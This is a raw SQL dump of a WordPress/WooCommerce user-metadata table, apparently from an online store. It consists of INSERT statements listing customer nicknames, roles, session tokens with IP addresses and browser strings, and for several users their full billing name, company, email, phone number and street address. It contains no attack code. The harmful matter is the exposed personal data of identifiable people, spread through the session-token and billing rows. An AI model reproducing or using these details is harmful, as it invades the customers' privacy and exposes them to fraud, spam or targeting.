INSERT INTO `wp_usermeta` VALUES (19966, 1343, 'session_tokens', 'a:1:{s:64:"a6ec3fca1de978947f740611aab282058693e2458eff8926af8074220c8492b7";a:4:{s:10:"expiration";i:1498680758;s:2:"ip";s:15:"198.102.155.120";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0";s:5:"login";i:1497471158;}}'); 
INSERT INTO `wp_usermeta` VALUES (19967, 1344, 'nickname', 'michael.stubblefield-1'); 
INSERT INTO `wp_usermeta` VALUES (19968, 1344, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (19969, 1344, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (19970, 1344, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (19971, 1344, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (19972, 1344, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (19973, 1344, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (19974, 1344, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (19975, 1344, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (19976, 1344, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (19977, 1344, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (19978, 1344, '_yoast_wpseo_profile_updated', '1497480297'); 
INSERT INTO `wp_usermeta` VALUES (19979, 1344, 'session_tokens', 'a:1:{s:64:"cbbb07bcf9ded7a4d53f13dd66b823f42edce316feec791aa33d966c9740a61b";a:4:{s:10:"expiration";i:1498689905;s:2:"ip";s:14:"130.135.33.250";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36";s:5:"login";i:1497480305;}}'); 
INSERT INTO `wp_usermeta` VALUES (19980, 1345, 'nickname', 'redwingscathy1955'); 
INSERT INTO `wp_usermeta` VALUES (19981, 1345, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (19982, 1345, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (19983, 1345, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (19984, 1345, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (19985, 1345, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (19986, 1345, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (19987, 1345, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (19988, 1345, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (19989, 1345, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (19990, 1345, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (19991, 1345, '_yoast_wpseo_profile_updated', '1497491400'); 
INSERT INTO `wp_usermeta` VALUES (19992, 1345, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (19993, 1346, 'nickname', 'prashant.naik'); 
INSERT INTO `wp_usermeta` VALUES (19994, 1346, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (19995, 1346, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (19996, 1346, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (19997, 1346, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (19998, 1346, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (19999, 1346, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (20000, 1346, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (20001, 1346, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20002, 1346, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (20003, 1346, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (20004, 1346, '_yoast_wpseo_profile_updated', '1497513581'); 
INSERT INTO `wp_usermeta` VALUES (20005, 1346, 'session_tokens', 'a:1:{s:64:"959396e17afbd4343f83f70541f06582ceee06c25156d89fbda838bb6bc840bf";a:4:{s:10:"expiration";i:1498723190;s:2:"ip";s:11:"150.251.5.1";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1497513590;}}'); 
INSERT INTO `wp_usermeta` VALUES (20006, 1346, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (20007, 1347, 'nickname', 'craig.whittle'); 
INSERT INTO `wp_usermeta` VALUES (20008, 1347, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20009, 1347, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20010, 1347, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (20011, 1347, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20012, 1347, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (20013, 1347, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (20014, 1347, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (20015, 1347, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20016, 1347, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (20017, 1347, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (20018, 1347, '_yoast_wpseo_profile_updated', '1497526117'); 
INSERT INTO `wp_usermeta` VALUES (20020, 1348, 'nickname', 'kathleen1991'); 
INSERT INTO `wp_usermeta` VALUES (20021, 1348, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20022, 1348, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20023, 1348, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (20024, 1348, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20025, 1348, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (20026, 1348, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (20027, 1348, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (20028, 1348, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20029, 1348, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (20030, 1348, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (20031, 1348, '_yoast_wpseo_profile_updated', '1497528324'); 
INSERT INTO `wp_usermeta` VALUES (20032, 1348, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (20033, 317, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (20034, 317, 'wp_dashboard_quick_press_last_post_id', '4561'); 
INSERT INTO `wp_usermeta` VALUES (20035, 317, 'wp_yoast_notifications', 'a:1:{i:0;a:2:{s:7:"message";s:499:"We\'ve noticed you\'ve been using Yoast SEO for some time now; we hope you love it! We\'d be thrilled if you could <a href="https://yoa.st/rate-yoast-seo">give us a 5 stars rating on WordPress.org</a>!\n\nIf you are experiencing issues, <a href="https://yoa.st/bugreport">please file a bug report</a> and we\'ll do our best to help you out.\n\n\n\n<a class="button" href="https://www.miller-stephenson.com/wp-admin/?page=wpseo_dashboard&yoast_dismiss=upsell">Please don\'t show me this notification anymore</a>";s:7:"options";a:8:{s:4:"type";s:7:"warning";s:2:"id";s:19:"wpseo-upsell-notice";s:5:"nonce";N;s:8:"priority";d:0.8000000000000000444089209850062616169452667236328125;s:9:"data_json";a:0:{}s:13:"dismissal_key";N;s:12:"capabilities";s:14:"manage_options";s:16:"capability_check";s:3:"all";}}}'); 
INSERT INTO `wp_usermeta` VALUES (20036, 317, 'wp_user-settings', 'editor=tinymce&libraryContent=browse&post_dfw=off'); 
INSERT INTO `wp_usermeta` VALUES (20037, 317, 'wp_user-settings-time', '1497537559'); 
INSERT INTO `wp_usermeta` VALUES (20038, 1349, 'nickname', 'dthomas1'); 
INSERT INTO `wp_usermeta` VALUES (20039, 1349, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20040, 1349, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20041, 1349, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (20042, 1349, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20043, 1349, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (20044, 1349, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (20045, 1349, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (20046, 1349, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20047, 1349, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (20048, 1349, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (20049, 1349, '_yoast_wpseo_profile_updated', '1497541764'); 
INSERT INTO `wp_usermeta` VALUES (20050, 1349, 'session_tokens', 'a:3:{s:64:"6bad1fcd6e1b9b2ed34f0f069179678df8908f68b50bdceec629606b4c7f7290";a:4:{s:10:"expiration";i:1498751373;s:2:"ip";s:13:"65.47.255.158";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1497541773;}s:64:"504784a2966b1773e99fd0abf3fa43d27120d4807dafbfff03941e4ba0d0af16";a:4:{s:10:"expiration";i:1497715216;s:2:"ip";s:13:"65.47.255.158";s:2:"ua";s:102:"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36";s:5:"login";i:1497542416;}s:64:"2575de1c3f9d2558780a43cee0feae8fd5021bcab2ce6acf4e5f92bbbb4f52ad";a:4:{s:10:"expiration";i:1497730531;s:2:"ip";s:13:"65.47.255.158";s:2:"ua";s:102:"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36";s:5:"login";i:1497557731;}}'); 
INSERT INTO `wp_usermeta` VALUES (20051, 1349, 'billing_first_name', 'Don'); 
INSERT INTO `wp_usermeta` VALUES (20052, 1349, 'billing_last_name', 'Thomas'); 
INSERT INTO `wp_usermeta` VALUES (20053, 1349, 'billing_company', 'KNXV-TV'); 
INSERT INTO `wp_usermeta` VALUES (20054, 1349, 'billing_email', 'dthomas@abc15.com'); 
INSERT INTO `wp_usermeta` VALUES (20055, 1349, 'billing_phone', '602 685-3041'); 
INSERT INTO `wp_usermeta` VALUES (20056, 1349, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (20057, 1349, 'billing_address_1', '515 N. 44th Street'); 
INSERT INTO `wp_usermeta` VALUES (20058, 1349, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (20059, 1349, 'billing_city', 'Phoenix'); 
INSERT INTO `wp_usermeta` VALUES (20060, 1349, 'billing_state', 'AZ'); 
INSERT INTO `wp_usermeta` VALUES (20061, 1349, 'billing_postcode', '85008'); 
INSERT INTO `wp_usermeta` VALUES (20062, 1350, 'nickname', 'drmonikag1969'); 
INSERT INTO `wp_usermeta` VALUES (20063, 1350, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20064, 1350, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20065, 1350, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (20066, 1350, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20067, 1350, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (20068, 1350, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (20069, 1350, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (20070, 1350, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20071, 1350, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (20072, 1350, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (20073, 1350, '_yoast_wpseo_profile_updated', '1497546338'); 
INSERT INTO `wp_usermeta` VALUES (20074, 1350, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (20076, 1351, 'nickname', 'sl_mielo'); 
INSERT INTO `wp_usermeta` VALUES (20077, 1351, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20078, 1351, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20079, 1351, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (20080, 1351, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20081, 1351, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (20082, 1351, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (20083, 1351, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (20084, 1351, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20085, 1351, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (20086, 1351, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (20087, 1351, '_yoast_wpseo_profile_updated', '1497553020'); 
INSERT INTO `wp_usermeta` VALUES (20088, 1351, 'session_tokens', 'a:1:{s:64:"76ebbad83fcf44261c2139467a18cc517026522d83ab2b90529886351ba4fc40";a:4:{s:10:"expiration";i:1498762629;s:2:"ip";s:13:"50.233.137.50";s:2:"ua";s:102:"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36";s:5:"login";i:1497553029;}}'); 
INSERT INTO `wp_usermeta` VALUES (20089, 1351, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (20090, 1352, 'nickname', 'john.petrovick'); 
INSERT INTO `wp_usermeta` VALUES (20091, 1352, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20092, 1352, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20093, 1352, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (20094, 1352, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20095, 1352, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (20096, 1352, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (20097, 1352, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (20098, 1352, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20099, 1352, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (20100, 1352, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (20101, 1352, '_yoast_wpseo_profile_updated', '1497558691'); 
INSERT INTO `wp_usermeta` VALUES (20102, 1352, 'session_tokens', 'a:1:{s:64:"c42027fba3ef41b8823783d9cddfde713f52dd8bf5fcea06d7fb5122ae9aa197";a:4:{s:10:"expiration";i:1498768299;s:2:"ip";s:13:"129.55.200.20";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0";s:5:"login";i:1497558699;}}'); 
INSERT INTO `wp_usermeta` VALUES (20103, 1352, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (20104, 1353, 'nickname', 'bsalinas'); 
INSERT INTO `wp_usermeta` VALUES (20105, 1353, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20106, 1353, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20107, 1353, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (20108, 1353, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20109, 1353, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (20110, 1353, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (20111, 1353, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (20112, 1353, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20113, 1353, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (20114, 1353, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (20115, 1353, '_yoast_wpseo_profile_updated', '1497561194'); 
INSERT INTO `wp_usermeta` VALUES (20116, 1353, 'session_tokens', 'a:1:{s:64:"a0c0b4d24bdc7093a108ff88dfdde382dca02100c30070cfb016151347824663";a:4:{s:10:"expiration";i:1498770803;s:2:"ip";s:12:"98.172.73.60";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0";s:5:"login";i:1497561203;}}'); 
INSERT INTO `wp_usermeta` VALUES (20117, 1353, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (20118, 1354, 'nickname', 'tensminger'); 
INSERT INTO `wp_usermeta` VALUES (20119, 1354, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20120, 1354, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20121, 1354, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (20122, 1354, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20123, 1354, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (20124, 1354, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (20125, 1354, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (20126, 1354, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20127, 1354, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (20128, 1354, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (20129, 1354, '_yoast_wpseo_profile_updated', '1497613471'); 
INSERT INTO `wp_usermeta` VALUES (20130, 1354, 'session_tokens', 'a:1:{s:64:"7d195f80f1fd4608dabb5deb625fc306f0abc823cbbf64e821db83034f21a016";a:4:{s:10:"expiration";i:1498823081;s:2:"ip";s:11:"72.25.0.163";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36";s:5:"login";i:1497613481;}}'); 
INSERT INTO `wp_usermeta` VALUES (20131, 1355, 'nickname', 'teainst'); 
INSERT INTO `wp_usermeta` VALUES (20132, 1355, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20133, 1355, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20134, 1355, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (20135, 1355, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20136, 1355, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (20137, 1355, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (20138, 1355, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (20139, 1355, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20140, 1355, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (20141, 1355, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (20142, 1355, '_yoast_wpseo_profile_updated', '1497622652'); 
INSERT INTO `wp_usermeta` VALUES (20143, 1355, 'session_tokens', 'a:1:{s:64:"a952f7cfc66c2163470c9cbef4b3bda194998f0d0eda463a385d53b5a00a0a5f";a:4:{s:10:"expiration";i:1498832261;s:2:"ip";s:13:"74.141.47.138";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36";s:5:"login";i:1497622661;}}'); 
INSERT INTO `wp_usermeta` VALUES (20144, 1355, 'billing_first_name', 'Zach'); 
INSERT INTO `wp_usermeta` VALUES (20145, 1355, 'billing_last_name', 'Economos'); 
INSERT INTO `wp_usermeta` VALUES (20146, 1355, 'billing_company', 'Thomas Enterprises'); 
INSERT INTO `wp_usermeta` VALUES (20147, 1355, 'billing_email', 'teainst@aol.com'); 
INSERT INTO `wp_usermeta` VALUES (20148, 1355, 'billing_phone', '3309892205'); 
INSERT INTO `wp_usermeta` VALUES (20149, 1355, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (20150, 1355, 'billing_address_1', '263 Lowell Ave NE'); 
INSERT INTO `wp_usermeta` VALUES (20151, 1355, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (20152, 1355, 'billing_city', 'Warren'); 
INSERT INTO `wp_usermeta` VALUES (20153, 1355, 'billing_state', 'OH'); 
INSERT INTO `wp_usermeta` VALUES (20154, 1355, 'billing_postcode', '44483'); 
INSERT INTO `wp_usermeta` VALUES (20155, 1355, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (20156, 1356, 'nickname', 'burbancic3'); 
INSERT INTO `wp_usermeta` VALUES (20157, 1356, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20158, 1356, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20159, 1356, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (20160, 1356, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20161, 1356, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (20162, 1356, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (20163, 1356, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (20164, 1356, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20165, 1356, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (20166, 1356, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (20167, 1356, '_yoast_wpseo_profile_updated', '1497627511'); 
INSERT INTO `wp_usermeta` VALUES (20168, 1356, 'session_tokens', 'a:1:{s:64:"5cfb83024ffe471c9af7b97f88efeb6044632c6b8e8bfcd785bab74d228c115d";a:4:{s:10:"expiration";i:1498837120;s:2:"ip";s:13:"12.236.66.226";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36";s:5:"login";i:1497627520;}}'); 
INSERT INTO `wp_usermeta` VALUES (20169, 1356, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (20170, 1357, 'nickname', 'd_e_r_e_kb'); 
INSERT INTO `wp_usermeta` VALUES (20171, 1357, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20172, 1357, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20173, 1357, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (20174, 1357, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20175, 1357, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (20176, 1357, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (20177, 1357, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (20178, 1357, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20179, 1357, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (20180, 1357, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (20181, 1357, '_yoast_wpseo_profile_updated', '1497630906'); 
INSERT INTO `wp_usermeta` VALUES (20182, 1357, 'session_tokens', 'a:1:{s:64:"ae833e8d2060595cb0dc0a9afafb2207f54a58e87f45bca4d0a582e112d21480";a:4:{s:10:"expiration";i:1498840515;s:2:"ip";s:15:"158.111.236.161";s:2:"ua";s:76:"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko";s:5:"login";i:1497630915;}}'); 
INSERT INTO `wp_usermeta` VALUES (20183, 1357, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (20184, 1358, 'nickname', 'kelley.ahlers'); 
INSERT INTO `wp_usermeta` VALUES (20185, 1358, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20186, 1358, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20187, 1358, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (20188, 1358, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20189, 1358, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (20190, 1358, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (20191, 1358, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (20192, 1358, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20193, 1358, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (20194, 1358, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (20195, 1358, '_yoast_wpseo_profile_updated', '1497636644'); 
INSERT INTO `wp_usermeta` VALUES (20196, 1358, 'session_tokens', 'a:2:{s:64:"45195bab425185f49e7d48456872ec6a47868cd7bfc41ca5c59a1a44f06a101d";a:4:{s:10:"expiration";i:1498846254;s:2:"ip";s:15:"199.116.173.173";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1497636654;}s:64:"34fa99564813e40b79dd53a57a4ff0395a10f8387c3bccac9a0f5f90cc879395";a:4:{s:10:"expiration";i:1497809551;s:2:"ip";s:15:"199.116.173.173";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1497636751;}}'); 
INSERT INTO `wp_usermeta` VALUES (20197, 1359, 'nickname', 'matthewscott'); 
INSERT INTO `wp_usermeta` VALUES (20198, 1359, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20199, 1359, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20200, 1359, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (20201, 1359, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20202, 1359, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (20203, 1359, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (20204, 1359, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (20205, 1359, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20206, 1359, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (20207, 1359, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (20208, 1359, '_yoast_wpseo_profile_updated', '1497637862'); 
INSERT INTO `wp_usermeta` VALUES (20209, 1359, 'session_tokens', 'a:1:{s:64:"7019105cbeee56e438aecc253ce811de20187e049eca0fe2fb863a4e4546a055";a:4:{s:10:"expiration";i:1498847471;s:2:"ip";s:12:"166.7.25.147";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1497637871;}}'); 
INSERT INTO `wp_usermeta` VALUES (20210, 1360, 'nickname', 'fvaillant'); 
INSERT INTO `wp_usermeta` VALUES (20211, 1360, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20212, 1360, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (20213, 1360, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (20214, 1360, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20215, 1360, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (20216, 1360, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (20217, 1360, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (20218, 1360, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (20219, 1360, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (20220, 1360, 'wp_user_level', '0'); 
